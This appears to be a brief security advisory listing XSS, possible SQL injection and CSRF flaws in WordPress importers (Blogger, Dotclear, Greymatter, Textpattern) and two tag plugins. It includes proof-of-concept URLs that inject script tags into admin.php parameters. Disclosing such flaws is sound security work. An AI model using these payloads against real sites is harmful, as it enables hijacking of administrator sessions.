---------------------------------------------------------------------
Blogger: XSS (svn head is vulnerable)

http://localhost/wp/wp-admin/admin.php?import=blogger&authors=2&blog=2'%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E

---------------------------------------------------------------------
Dotclear: persistent XSS and possible SQL Injection (all versions seem to be vulnerable)

Notes: SQL Injection would be possible if the attacker knows the database credentials (dbprefix is not sanitised).

[html]
[/html]

---------------------------------------------------------------------
Greymatter: XSS (all versions seem to be vulnerable)

http://localhost/wp/wp-admin/admin.php?import=greymatter&step=1&archivespath=%3Cscript%3Ealert(/XSS/)%3C/script%3E

---------------------------------------------------------------------
Textpattern: persistent XSS and possible SQL Injection (all versions seem to be vulnerable)

Similar PoC to Dotclear.

---------------------------------------------------------------------
"Ultimate Tag Warrior" and "Category to tag converter" are vulnerable to CSRF attacks.